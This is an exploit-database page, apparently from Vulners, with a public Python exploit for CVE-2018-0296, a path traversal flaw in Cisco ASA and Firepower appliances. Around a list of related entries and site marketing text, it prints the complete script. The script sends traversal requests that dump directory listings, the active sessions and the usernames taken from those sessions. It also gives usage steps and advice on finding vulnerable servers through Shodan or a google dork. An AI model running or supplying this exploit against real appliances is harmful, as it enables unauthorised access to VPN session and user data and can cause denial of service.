Vulners
Lucene search
Cisco Adaptive Security Appliance - Path Traversal
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | Cisco Adaptive Security Appliance - Path Traversal Exploit | 29 Jun 201800:00 | – | zdt |
| Cisco Adaptive Security Appliance Path Traversal Exploit | 24 Jul 201800:00 | – | zdt |
| Cisco Adaptive Security Appliance - Path Traversal Exploit | 12 Aug 201900:00 | – | zdt |
 | Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios | 22 Jan 201821:15 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 21 Jun 201815:44 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 28 Sep 202005:00 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 21 Jun 201808:36 | – | githubexploit |
 | CVE-2025-20362 | 25 Sep 202516:12 | – | attackerkb |
| Cisco ASA Directory Traversal | 7 Jun 201800:00 | – | attackerkb |
 | CVE-2018-0296 | 28 Jun 201809:11 | – | circl |
10
'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
import re
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
''' Extraccion de usuarios'''
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group()+"\n")
''' Fin Extraccion de usuarios'''
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2018 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.94404
SSVC